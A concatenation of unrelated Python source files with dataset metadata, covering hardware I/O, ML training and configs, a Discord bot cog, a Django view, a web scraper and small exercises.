#GPIO.setmode(GPIO.BCM)\n #Kanal0\n #GPIO.setup(intKanal0,GPIO.IN, pull_up_down = GPIO.PUD_DOWN)\n #GPIO.add_event_detect(intKanal0, GPIO.FALLING, callback=thread_interrupt, bouncetime = 5)\n #Kanal1\n #GPIO.setup(intKanal1,GPIO.IN, pull_up_down = GPIO.PUD_DOWN)\n #GPIO.add_event_detect(intKanal1, GPIO.FALLING, callback=thread_interrupt, bouncetime = 5)\n #Kanal2\n #GPIO.setup(intKanal2,GPIO.IN, pull_up_down = GPIO.PUD_DOWN)\n #GPIO.add_event_detect(intKanal2, GPIO.FALLING, callback=thread_interrupt, bouncetime = 5)\n\n #MUX initialisieren:\n log(\"Bus:\" + str(bus) + \" Kanal:\" + str(kanal))\n plexer = multiplex(bus)\n plexer.channel(mux,kanal)\n time.sleep(0.01)\n modulSuche()\n log(datetime.now())\n log(\"UDP Port: {0}\".format(miniServerPort))\n\n #TCP Socket:\n tcpSocket=socket.socket(socket.AF_INET, socket.SOCK_STREAM) #Internet, UDP\n tcpSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)\n tcpSocket.bind((\"0.0.0.0\",miniServerPort))\n tcpSocket.listen(5)\n thread_gecosOut()\n\n\n #RTC Lesen:\n plexer.channel(mux,3) \n ds = DS1307(bus, 0x68)\n rtctime = ds.read_datetime()\n temp = ds.read_temp()\n print (\"DS3231 Date: {0} Temp: {1} \".format(rtctime.strftime(\"%d.%m.%Y %H:%M:%S\"),str(temp)))\n while True:\n #Alle eingänge lesen\n time.sleep(0.01)\n #Schleife für Eingang Lesen:\n for device in aIN0:\n try:\n kanal=0\n read_input(kanal,device)\n except:\n statusI2C=1\n pass\n for device in aIN1:\n try:\n kanal=1\n read_input(kanal,device)\n except:\n statusI2C=1\n pass\n for device in aIN2:\n try:\n kanal=2\n read_input(kanal,device)\n except:\n statusI2C=1\n pass\n","sub_path":"Symcon.py","file_name":"Symcon.py","file_ext":"py","file_size_in_byte":54619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"534519699","text":"\n# Copyright 2022 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# Copyright (c) Open-MMLab. All rights reserved. \n_base_ = 'mask_rcnn_r50_fpn_syncbn-all_rpn-2conv_ssj_32x2_270k_coco.py'\n\n# lr steps at [0.9, 0.95, 0.975] of the maximum iterations\nlr_config = dict(\n warmup_iters=500, warmup_ratio=0.067, step=[81000, 85500, 87750])\n# 90k iterations with batch_size 64 is roughly equivalent to 48 epochs\nrunner = dict(type='IterBasedRunner', max_iters=90000)\n","sub_path":"PyTorch/dev/cv/detection/YOLOX_ID2833_for_PyTorch/configs/simple_copy_paste/mask_rcnn_r50_fpn_syncbn-all_rpn-2conv_ssj_32x2_90k_coco.py","file_name":"mask_rcnn_r50_fpn_syncbn-all_rpn-2conv_ssj_32x2_90k_coco.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"338199214","text":"import pymysql as mysql \nimport pandas as pd\nimport numpy as np \nfrom dateutil import parser\nconn = mysql.connect(host='127.0.0.1', port=10002, user='root', passwd='root', db='pe')\ncursor=conn.cursor()\nsql=\"SHOW TABLES\"\ncursor.execute(sql)\ntable=cursor.fetchall()\nfor i in table:\n\tif i[0] == 'order' or i[0] =='auth_item':\n\t\tcontinue\n\telse:\n\t\tsql=\"SELECT * FROM \"+i[0] \n\tdf = pd.read_sql(sql, con=conn)\n\tif set(['updated_at','created_at']).issubset(df.columns):\n\t\tminima=2000000\n\t\tcreated_at=df['created_at']\n\t\tupdated_at=df['updated_at']\n\t\tfor k in range(len(created_at)):\n\t\t\tif created_at[k] is None or updated_at[k] is None or created_at[k]=='0000-00-00 00:00:00' or updated_at[k]=='0000-00-00 00:00:00':\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tif minima > (updated_at[k]-created_at[k]).seconds :\n\t\t\t\t\tminima= (updated_at[k]-created_at[k]).seconds \n\t\tif minima > 1000 :\n\t\t\tprint(i[0])\n\t\t\n\n\n\t\t\t\t\n\n\t\t\n\t\t\n","sub_path":"ttl.py","file_name":"ttl.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"90691668","text":"\"\"\"\r\n\n\nLuke Skywalker has family and friends. Help him remind them who is who. Given\na string with a name, return the relation of that person to Luke.\n\nPerson| Relation \n---|--- \nDarth Vader| father \nLeia| sister \nHan| brother in law \nR2D2| droid \n \n### Examples\n\n relation_to_luke(\"Darth Vader\") ➞ \"Luke, I am your father.\"\n \n relation_to_luke(\"Leia\") ➞ \"Luke, I am your sister.\"\n \n relation_to_luke(\"Han\") ➞ \"Luke, I am your brother in law.\"\n\n### Notes\n\nN/A\n\n\"\"\"\r\n\nrelation_to_luke=lambda n:'Luke, I am your %s.'%{'D':'father','L':'sister','H':'brother in law','R':'droid'}[n[0]]\n\n","sub_path":"8pDH2SRutPoaQghgc_3.py","file_name":"8pDH2SRutPoaQghgc_3.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"435237193","text":"#All credit to ShaneLynn.com for the datasets\n# They have been cloned to the\n# Goal: Clean up the datasets, do any necessary joins or merges, look at descriptive stats, then run a a one-way ANOVA \n\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom statsmodels.formula.api import ols\nimport statsmodels.api as sm\n\n\n\nusers = pd.read_csv('Datasets/user_usage.csv')\ndevice = pd.read_csv('Datasets/user_device.csv')\n##andro = pd.read_csv('Datasets/android_devices.csv')\n\nusers['use_id'].isin(device.use_id).value_counts()\n#check if values in users use_id column are present in device use_id column\n\ndevice['use_id'].isin(users['use_id']).value_counts()\n#what about the other way around?\n\n#Merge users and devices\nuser_device = pd.merge(users,device [['use_id', 'platform', 'device']],\non = 'use_id', how = 'left') #merge of the left dataset, right dataset responsible for providing null columns\nuser_device.head()\n\n\n###\nuser_device['device'].value_counts()\n#So we have potential groups here but Device Types are labelled too specifically\n#let's see if we can't use apply and functions to clean it up\n\n\n#custom function for cleaning up NANs and replace with Uknown for categorical data\ndef clean(value) :\n if isinstance(value, float) and value is np.nan :\n return \"Unknown\"\n else:\n return value\n\n#function for reducing the granularity of Devices, collapsing accoring to brands.\n\ndef collapse(value):\n if (value.lower().startswith(\"moto\")):\n return \"Motorola\"\n elif (value.lower().startswith(\"iphone\")):\n return \"Apple\"\n elif (value.lower(). startswith(\"one\")):\n return \"OnePlus\"\n elif (value.lower(). startswith(\"htc\")):\n return \"HTC\"\n elif (value.lower(). startswith(\"hua\") or value.lower(). startswith(\"eva\") ):\n return \"Huawei\"\n elif (value.lower(). startswith(\"lg\") or value.lower(). startswith(\"nexus\") ):\n return \"LG\"\n elif (value.lower(). startswith(\"lenovo\")):\n return \"Lenovo\"\n elif (value.lower(). startswith(\"vf\") or value.lower(). startswith(\"voda\")):\n return \"Vodafone\"\n elif (value.lower().startswith(\"gt\") or value.lower().startswith(\"sm\")):\n return \"Samsung\"\n elif (value[1:].isdigit()):\n return \"Sony\"\n else :\n return value\n\nuser_device['device'] = user_device['device'].apply(clean)\n\n#Let's check if we've removed all the NANs\nuser_device['device'].value_counts(dropna = False)\n#Yes we have\n\n#Now let's clean up the devices, organizing them by Brands\nuser_device['device'] = user_device['device'].apply(collapse)\nuser_device.device.value_counts(dropna = False)\n\n\n####ANOVA:\n##H0: There is no a significant difference between devices and outgoing minutes\n##Let's get a descriptive summary of the target column 'out-going minutes', but first let's make life easier and rename wordy columns\n\nuser_device.rename(columns = {'outgoing_mins_per_month': 'out_min', 'outgoing_sms_per_month' : 'out_sms' }, inplace = True )\n\nnp.mean(user_device['out_min'])\nnp.median(user_device['out_min'])\nnp.std(user_device['out_min'])\n\n##There might be some outliers given the difference between median and mean\n##let's visualize\ny = user_device['out_min']\nx = user_device.use_id\ny_std = np.std(y)\noutliers = user_device[np.abs(user_device['out_min'] -user_device['out_min'].mean()) > 3 * np.std(user_device['out_min']) ]\nplt.title(\"Outgoing Minutes - Showing Outliers\")\nplt.ylabel(\"Outgoing minutes\")\nplt.xlabel(\"User ID\")\nplt.scatter(x, y, c = 'c', marker = 'X')\nplt.scatter(outliers.use_id, outliers['out_min'], c = 'r', marker = 'X', s = 75)\nplt.show()\n\n### The outlier are those users with outgoing minutes above 1200. Let's drop them.\nuser_device = user_device[user_device.out_min <1200]\n\nuser_device[['out_min', 'device']].groupby('device').size()\n\n#some of these groups are quite small so the residuals may not meet ANOVA assumptions\n#which may have an affect on robustness of the ANOVA test\n#So let's run ANOVA on larger group of known brands, those with counts closer to 20\n\nmodel = ols('out_min ~ C(device)', user_device).fit()\ntable = sm.stats.anova_lm(model, typ=2)\nprint(table)\n#So there seems to be a statistically significant difference between the device/brands. However,\n#caveat is that some residuals are small, so it may affect robustness of test.\n","sub_path":"Stat_Analysis_Anova/ANOVA.py","file_name":"ANOVA.py","file_ext":"py","file_size_in_byte":4323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"631104031","text":"class Trie_Node(object):\n '''\n implements a Trie Node\n '''\n def __init__(self):\n self.children = [None] * 26\n self.is_end = False\n\nclass Trie(object):\n '''\n implements a Trie data structure\n '''\n def __init__(self):\n self.root = self.get_node()\n\n def get_node(self):\n '''\n return a Trie_Node initialized to Null\n '''\n return Trie_Node()\n\n def _char_to_index(self, ch):\n '''\n return index of ch in alphabet\n '''\n if ch.isupper():\n return ord(ch) - ord(\"A\")\n else:\n return ord(ch) - ord(\"a\")\n\n def insert(self, word):\n curr = self.root\n for ch in word:\n indx = self._char_to_index(ch)\n if not curr.children[indx]:\n curr.children[indx] = self.get_node()\n curr = curr.children[indx]\n curr.is_end = True\n\n\n def search(self, word):\n curr = self.root\n for ch in word:\n indx = self._char_to_index(ch)\n if not curr.children[indx]:\n return False\n curr = curr.children[indx]\n return curr != None and curr.is_end\n\ntest = Trie()\ndicts= [\"the\",\"a\",\"there\",\"anaswe\",\"any\",\"by\",\"their\"]\noutput = [\"Not present in trie\", \"Present in trie\"]\n\nfor d in dicts:\n test.insert(d)\n\nprint(\"{} ----- {}\".format(\"any\", output[test.search(\"any\")]))\nprint(\"{} ----- {}\".format(\"he\", output[test.search(\"the\")]))\nprint(\"{} ----- {}\".format(\"raj\", output[test.search(\"raj\")]))\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Miscellaneous/Trie3.py","file_name":"Trie3.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"391010452","text":"import tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\n\ndef visualize(w, rows):\n w = np.reshape(w, [rows, 8, 8])\n\n plt.figure()\n\n for i in range(rows):\n plot = plt.subplot(1, rows, i + 1)\n plt.axis('off')\n # From piazza\n plt.imshow(w[i], cmap=plt.cm.gray, vmin=0.5 * w.min(), vmax=0.5 * w.max())\n # Remove spacing between the images\n plt.subplots_adjust(wspace=0, hspace=0)\n\nif __name__ == '__main__':\n # Load the tinymnist dataset\n with np.load(\"tinymnist.npz\") as data:\n trainData, trainTarget = data['x'], data['y']\n testData, testTarget = data['x_test'], data['y_test']\n validData, validTarget = data['x_valid'], data['y_valid']\n\n tf.set_random_seed(521)\n\n x = tf.placeholder(tf.float32)\n y = tf.placeholder(tf.float32)\n\n for K in range(4, 5):\n D = trainData.shape[1]\n learning_rate = 0.05\n\n # Variables\n average = tf.reduce_mean(x, 0)\n mean = tf.Variable(tf.random_normal([D], dtype=tf.float32))\n # The mean must be between 0 and 1\n mean = tf.sigmoid(mean)\n psi = tf.Variable(tf.random_normal([D], dtype=tf.float32))\n # Psi must be a diagonal matrix with positive eigenvalues\n psi = tf.diag(tf.exp(psi))\n W = tf.Variable(tf.random_normal([D, K], dtype=tf.float32))\n\n # Calculate psi + WW^T.\n # This is a Tensor of shape [D, D]\n matrix = psi + tf.matmul(W, tf.transpose(W))\n # Calculate the log determinant of this matrix using Cholesky decomposition\n log_det = 2.0 * tf.reduce_sum(tf.log(tf.diag_part(tf.cholesky(matrix))))\n\n # Calculate the (x - mean)^T * (matrix) * (x - mean) term\n # This is a Tensor of shape [B]\n log_exp = -tf.reduce_sum((x - mean) * tf.reduce_sum(tf.matrix_inverse(matrix) * tf.expand_dims(x - mean, 1), -1), -1) / 2\n\n # Calculate the log marginal likelihood from each term\n # This is a Tensor of shape [B]\n log_marginal_likelihood = tf.reduce_sum(-D / 2 * tf.log(2 * math.pi) - log_det / 2 + log_exp)\n\n loss = -log_marginal_likelihood\n\n optimizer = tf.train.AdamOptimizer(learning_rate, beta1=0.9, beta2=0.99, epsilon=1e-5).minimize(loss)\n\n sess = tf.InteractiveSession()\n init = tf.global_variables_initializer()\n sess.run(init)\n\n losses = []\n for j in range(200):\n print(j)\n _, current_loss = sess.run([optimizer, loss], feed_dict={ x:trainData, y:trainTarget })\n losses.append(current_loss)\n\n print(\"Training log marginal likelihood: \" + str(sess.run(log_marginal_likelihood, feed_dict={ x:trainData, y:trainTarget })))\n print(\"Testing log marginal likelihood: \" + str(sess.run(log_marginal_likelihood, feed_dict={ x:testData, y:testTarget })))\n print(\"Validation log marginal likelihood: \" + str(sess.run(log_marginal_likelihood, feed_dict={ x:validData, y:validTarget })))\n\n plt.figure()\n plt.plot(losses)\n plt.title('Loss vs. Number of Updates k=' + str(K))\n\n visualize(sess.run(tf.transpose(W)), K)\n visualize(sess.run(mean, feed_dict={ x:trainData, y:trainTarget }), 1)\n visualize(sess.run(average, feed_dict={ x:trainData, y:trainTarget }), 1)\n plt.show()\n","sub_path":"part3_1_2.py","file_name":"part3_1_2.py","file_ext":"py","file_size_in_byte":3498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"31895739","text":"import discord\nfrom discord.ext import commands\nimport aiosqlite\n\nclass Config(commands.Cog):\n def __init__(self, client):\n self.client = client\n\n async def check_blacklist(self, id):\n db = await aiosqlite.connect('./bot/db/config.db')\n cursor = await db.cursor()\n \n await cursor.execute(f\"SELECT id FROM blacklist WHERE id = {id}\")\n result = await cursor.fetchone()\n\n await db.close()\n await cursor.close()\n\n if result is None:\n return False\n \n else:\n return True\n\n async def check_ff(self, guild):\n db = await aiosqlite.connect('./bot/db/config.db')\n cursor = await db.cursor()\n await cursor.execute(f\"SELECT familyfriendly FROM config WHERE guild_id = {guild.id}\")\n check = await cursor.fetchone()\n if check == None:\n await cursor.execute(f\"SELECT guild_id FROM config WHERE guild_id = {guild.id}\")\n check0 = await cursor.fetchone()\n if check0 is None:\n await cursor.execute(f\"INSERT INTO config (guild_id, familyfriendly) VALUES ({guild.id}, 0)\")\n else:\n await cursor.execute(f\"UPDATE config SET familyfriendly = 0 WHERE guild_id = {guild.id}\")\n await db.commit()\n await cursor.close()\n await db.close() \n return \"Inactive\"\n if check[0] == 1: \n return \"Active\"\n elif check[0] == 0:\n return \"Inactive\" \n elif check[0] == 2:\n return \"fuf\"\n\n @commands.group(invoke_without_command=True, disabled=True)\n async def config(self, ctx):\n embed = discord.Embed(title=\"Configuration Settings\", colour=discord.Colour.gold())\n embed.add_field(name=\"Family Friendly Mode\", value=f\"Status: {await self.check_ff(ctx.guild)}\\n \"\n \"DISCLAIMER: Family friendly mode does not apply to the bot's AI function.\")\n await ctx.send(embed=embed)\n \n @config.command(disabled=True)\n async def ff(self, ctx, mode):\n db = await aiosqlite.connect('./bot/db/config.db')\n cursor = await db.cursor()\n status = await self.check_ff(ctx.guild)\n if mode == \"activate\" or \"on\":\n if status == \"Active\":\n await ctx.send(\"Family friendly mode is already active!\")\n else:\n await cursor.execute(f\"UPDATE config SET familyfriendly = 1 WHERE guild_id = {ctx.guild.id}\")\n await ctx.send(\"Family friendly mode now active!\")\n elif mode == \"deactivate\":\n if status == \"Inactive\":\n await ctx.send(\"Family friendly mode is already inactive!\")\n else:\n await cursor.execute(f\"UPDATE config SET familyfriendly = 0 WHERE guild_id = {ctx.guild.id}\")\n await ctx.send(\"Family friendly mode deactivated.\")\n elif mode == \"fuf\" or \"off\" or \"deactivate\":\n if status == \"fuf\":\n await ctx.send(\"Your forgetfull ass forgot that family unfriendly mode was already on.\")\n else:\n embed = discord.Embed(name=\"⚠YOU ARE ABOUT TO TURN ON FAMILY **UN**FRIENDLY MODE⚠\")\n embed.add_field(name=\"What is it?\", value=\"Family unfriendly mode is a version of Conchbot in which \"\n \"every single message has some sort of insult or other content labeled Not Safe For Work. (Curses, \"\n \"innapropriate naming schemes, etc.)\")\n embed.add_field(name=\"Effects:\", value=\"All of the begging command's names are now NSFW, every message \"\n \"sent by ConchBot has innapropriate language in it, etc.\")\n embed.add_field(name=\"ARE YOU SURE?\", value=\"After this message, you are required to send either 'yes' \"\n \"or 'no,' the prompt being if you want to turn on family unfriendly mode or not.\")\n embed.set_footer(text=\"You better make the right choice.\")\n embed.set_thumbnail(url=\"https://i.imgur.com/OJwc0yL.jpeg\")\n await ctx.send(embed=embed)\n msg = await self.client.wait_for('message', check=lambda message: message.author == ctx.author, timeout=60)\n if \"no\" in msg.content.lower():\n await ctx.send(\"Alright. No family unfriendly mode for you.\")\n elif \"yes\" in msg.content.lower():\n await cursor.execute(f\"UPDATE config SET familyfriendly = 2 WHERE guild_id = {ctx.guild.id}\")\n await ctx.send(\"Alrighty motherfucker. Family unfriendly mode is now activated, bitch.\")\n else:\n await ctx.send(\"Invalid answer.\")\n else:\n await ctx.send(\"Invalid argument. Your argument should either be `activate`,`deactivate`, or `fuf`, or `off`, `on`.\")\n await db.commit()\n await cursor.close()\n await db.close()\n\ndef setup(client):\n client.add_cog(Config(client))","sub_path":"bot/cogs/BotConfig.py","file_name":"BotConfig.py","file_ext":"py","file_size_in_byte":4979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"557293042","text":"from sklearn import linear_model\nfrom sklearn.metrics import accuracy_score\n\nfrom useful_components import TwitterDataSet, save_persistant_model\n\n\ndef support_vec_classifier_with_stochastic_gradient_descent():\n data_set = TwitterDataSet(TfIdfTransform_Bool=True)\n\n # split data set for training and testing\n X_train, X_test, y_train, y_test = data_set.get_test_train_split()\n\n classifier = linear_model.SGDClassifier(alpha=.000001, loss='hinge', # hinge is what makes it default to Support Vector Machine\n max_iter=1000, tol=1e-3)\n classifier.fit(X_train, y_train)\n y_pred = classifier.predict(X_test)\n\n print(accuracy_score(y_test, y_pred))\n\n vec_path = 'SVM_SGD_persistent_model/vectorizer.joblib'\n model_path = 'SVM_SGD_persistent_model/model.joblib'\n save_persistant_model(vec_path, model_path, classifier, data_set)\n return classifier\n\n\n\n\nsupport_vec_classifier_with_stochastic_gradient_descent()\n","sub_path":"SupportVectorClassifierWithSGD.py","file_name":"SupportVectorClassifierWithSGD.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"184167505","text":"def out(tree,start,end,a):\n if(start> 27\n```\n\n```\npython find_subsequence.py data/input_2.txt 5 differences\n>> 58\n```\n\n```\npython find_subsequence.py data/input_3.txt 30 values\n>> 44\n```\n\n```\npython find_subsequence.py data/input_3.txt 10 differences\n>> 40\n\n'''\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"Data\", type=str, help=\"The input file\")\n parser.add_argument(\"n\", type=int, help=\"The maximum length of the subsequence\")\n parser.add_argument(\"metric\", type=str, help=\"The calculation metric\")\n args = parser.parse_args()\n txtFile = open(args.Data)\n main(txtFile, args.n, args.metric)\n","sub_path":"Job_Assignments/find_subsequence.py","file_name":"find_subsequence.py","file_ext":"py","file_size_in_byte":5860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"67736328","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.conf import settings \nfrom gallery.models import RedditPost, Subreddit\n\ndef index(request):\n if settings.USE_CACHE:\n # Get reddit posts and subreddits from Redis cache\n context = {'reddit_posts_by_pane': RedditPost.objects.get_all_from_cache(),\n 'subreddits': Subreddit.objects.get_all_from_cache()}\n else:\n # Get reddit posts and subreddits from SQL DB\n subreddits = Subreddit.objects.all()\n reddit_posts_by_pane = {}\n\n # Organize reddit posts by the subreddit they are from\n for subreddit in subreddits:\n reddit_posts_by_pane[subreddit.pane_name] = RedditPost.objects.select_all_with_subreddit(subreddit)\n\n context = {'reddit_posts_by_pane':reddit_posts_by_pane,\n 'subreddits': subreddits}\n\n return render(request, 'gallery.html', context)\n","sub_path":"redditorama/apps/gallery/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"645704070","text":"import matplotlib.pyplot as plt\n\nfrom simulation import Scheme\n\n\ndef export(simulations, file_path, marker_styles=None):\n xticks = []\n\n for scheme, simulations2 in simulations.items():\n xs = []\n ys = []\n\n for num_stations, simulation in simulations2.items():\n if num_stations not in xticks and num_stations % 10 == 0:\n xticks.append(num_stations)\n\n xs.append(num_stations)\n ys.append(simulation.successful_transmissions)\n\n if marker_styles is None:\n plt.plot(xs, ys, 'o-', label=Scheme.to_human_name(scheme))\n else:\n plt.plot(xs, ys, label=Scheme.to_human_name(scheme), **marker_styles[scheme])\n\n plt.grid()\n plt.xlabel('Number of Stations')\n plt.ylabel('Number of Successful Transmissions')\n plt.xticks(xticks)\n plt.legend(fancybox=True, framealpha=1.0)\n plt.savefig(file_path, bbox_inches='tight')\n plt.clf()\n","sub_path":"exporters/stations_transmissions_plot.py","file_name":"stations_transmissions_plot.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"583912119","text":"\nfrom random import randint\nprint (\"Welcome to this dice roling simulator\")\n\ndef rollAndPrint(min, max) :\n die = randint(min, max)\n print (\"You rolled a \",die,\" !\\n\")\n\nminimum = int(input(\"Input the minimum number of your die (usualy 1) \"))\nmaximum = int(input(\"Input the maximum number of your die (usualy 6) \"))\nnum = int(input(\"How many dice do you want to roll ? \"))\nif (minimum < 0) or (maximum < 0) or (num <= 0) :\n print(\"reeeeeee\")\n raise ValueError('A very specific bad thing happened')\n\nfor i in range (0, num):\n rollAndPrint(minimum, maximum)\n\nprint (\"Thank you for using this shit program!\")\n","sub_path":"dice.py","file_name":"dice.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"82620674","text":"import RPi.GPIO as GPIO\nimport time\nimport sys\n\nGPIO.setmode(GPIO.BOARD)\nGPIO.setwarnings(False)\nGPIO.setup(16,GPIO.OUT)\n\npwmOne = GPIO.PWM(16, 100)\npwmOne.start(0)\ni = 0\nwhile(i == 0 ):\n duty1 = float(sys.argv[1]) / 10.0 + 2.5\n pwmOne.ChangeDutyCycle(duty1)\n time.sleep(0.4)\n break\nquit()\n\n","sub_path":"servo_controller/servoCMD4.py","file_name":"servoCMD4.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"452344790","text":"#!/usr/bin/python2.7\n# coding=utf-8\n\"\"\"\nCreated on 2015-4-27\n\n@author: Jay\n\"\"\"\nimport site\nimport os\nsite.addsitedir(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))\nsite.addsitedir(os.path.join(os.path.dirname(os.path.dirname(os.path.realpath(__file__))), \"common_server\"))\nfrom gevent import monkey\nmonkey.patch_all()\n\nfrom utils.service_control.controller import MainService\nfrom mxadap import setting\n\n\n\nclass Service(MainService):\n \"\"\"\n 主服务\n \"\"\"\n def __init__(self):\n super(Service, self).__init__(setting.SERVICE_TYPE, setting.VERSION)\n\n def init(self, args):\n \"\"\"\n 初始化接口\n :param args: 参数变量\n :return:\n \"\"\"\n from utils.openfire.user_service import UserService\n UserService(args.openfire_ip, args.openfire_port)\n\n # init xmpp client to openfire server\n from mxadap.apps.mqtt_app import MQTT_APP\n MQTT_APP().init(args.mqtt_ip, args.mqtt_port)\n\n def services(self, args, thread_ls):\n \"\"\"\n 添加服务接口\n :param args: 参数变量\n :param thread_ls: 现有的服务列表\n :return:\n \"\"\"\n from mxadap.apps.mqtt_app import MQTT_APP\n thread_ls.append(MQTT_APP())\n\n def add_cmd_opts(self, arg_parser):\n \"\"\"\n 在获取sm参数之前,提供添加arg_parser参数接口\n :param arg_parser: 参数变量\n :return:\n \"\"\"\n from utils.service_control.parser import parser_boolean\n arg_parser.add_argument('--xxtea_key', default='A~3c1(@8$B65Wb<9', type=str, help=\"The key of XXTEA cryptor\")\n arg_parser.add_argument('--use_xxtea', default=False, type=parser_boolean, help=\"Whether to use the xxtea crypto\")\n arg_parser.add_argument('--use_sign', default=False, type=parser_boolean, help=\"whethor to use the service sign\")\n arg_parser.add_argument('--mxadap_etime', default=60, type=int, help=\"The time to expire the mqtt adapter connection\")\n\n arg_parser.add_argument('--mqtt_ip', type=str, help=\"The ip of the mqtt server\")\n arg_parser.add_argument('--mqtt_port', type=int, help=\"The port of the mqtt server\")\n\n arg_parser.add_argument('--openfire_ip', type=str, help=\"The host of the openfire\")\n arg_parser.add_argument('--openfire_port', type=int, help=\"The port used for unsecured admin console access\")\n\n\nif __name__ == \"__main__\":\n import sys\n reload(sys)\n sys.setdefaultencoding('utf8')\n Service().start_service()\n","sub_path":"server/workspace/mxadap/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":2518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"508144970","text":"import requests\nfrom bs4 import BeautifulSoup\nimport re\n\nurl = 'http://www.footballlocks.com/nfl_point_spreads.shtml'\n\ndef get_spreads(url):\n games = {}\n\n f,u,s, = 5,7,6\n\n i = 1\n\n response = requests.get(url)\n soup = BeautifulSoup(response.text, 'lxml')\n \n tables = soup.find('table', {'cols' : '4'})\n \n spreads = tables.find_all('td')\n \n for td in range(len(spreads)):\n try:\n favorite = spreads[f].text\n underdog = spreads[u].text\n spread = spreads[s].text\n out_msg = (f'Game: {i}, Favorite: {favorite.upper()}, Underdog: {underdog.upper()}, Spread: {spread}')\n out_msg = re.sub('AT ', '', out_msg)\n print(out_msg)\n print()\n f,u,s,i = f+4, u+4, s+4, i+1\n except:\n pass\n\n\nif __name__ == \"__main__\":\n get_spreads(url)\n","sub_path":"nfl_spreads.py","file_name":"nfl_spreads.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"1296017","text":"# _*_ coding:utf-8 _*_\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import preprocessing\nfrom sklearn.neural_network import MLPRegressor\nfrom sklearn.ensemble import GradientBoostingRegressor\n\nimport pandas as pd\n\n# read dataset\ndata = pd.read_excel('./RealEstateValuationDataSet.xlsx',index_col=0)\nprint(data.info())\n\n# preprocess dataset\ndata['X1 transaction date'] = data['X1 transaction date'] - 2012\ndata['X3 distance to the nearest MRT station'] = data['X3 distance to the nearest MRT station'] / 1000\nY = data['Y house price of unit area']\nX = data.drop(columns=['Y house price of unit area'])\nx = X.values\ny = Y.values\n\nprint('##################################################################') \n# 随机挑选\ntrain_x, test_x, train_y, test_y = train_test_split(x, y, train_size=0.8, random_state=33)\n\n#数据标准化\nss_x = preprocessing.StandardScaler()\ntrain_x = ss_x.fit_transform(train_x)\ntest_x = ss_x.transform(test_x)\n \nss_y = preprocessing.StandardScaler()\ntrain_y = ss_y.fit_transform(train_y.reshape(-1, 1))\ntest_y = ss_y.transform(test_y.reshape(-1, 1))\n\n# 多层感知器-回归模型 参数选择 3,26,28\n'''\nprint('###############################参数网格优选###################################')\ndef genrator():\n for i in range(3,10):\n for j in range(3,30):\n for k in range(3,30):\n yield (i,j,k)\nbest_score = 0\nbest_list = []\nnum = 0\nfor i,j,k in genrator():\n model_mlp = MLPRegressor(hidden_layer_sizes=(i,j,k), activation='relu', solver='adam', alpha=0.0001, batch_size='auto',\n learning_rate='constant', learning_rate_init=0.001, power_t=0.5, max_iter=200, shuffle=True,\n random_state=1, tol=0.0001, verbose=False, warm_start=False, momentum=0.9, nesterovs_momentum=True,\n early_stopping=False,beta_1=0.9, beta_2=0.999, epsilon=1e-08)\n model_mlp.fit(train_x,train_y.ravel())\n mlp_score=model_mlp.score(test_x,test_y.ravel())\n num = num+1\n if num%30 == 0:\n print('num:',num,i,j,k)\n if mlp_score>70.0:\n print('sklearn MLP',mlp_score)\n print(i,j,k)\n if mlp_score > best_score:\n best_list = [i,j,k]\n print('new_score',mlp_score,'and list',best_list)\n best_score = mlp_score\nprint('best_list',best_list)\n'''\n\n# 集成-回归模型 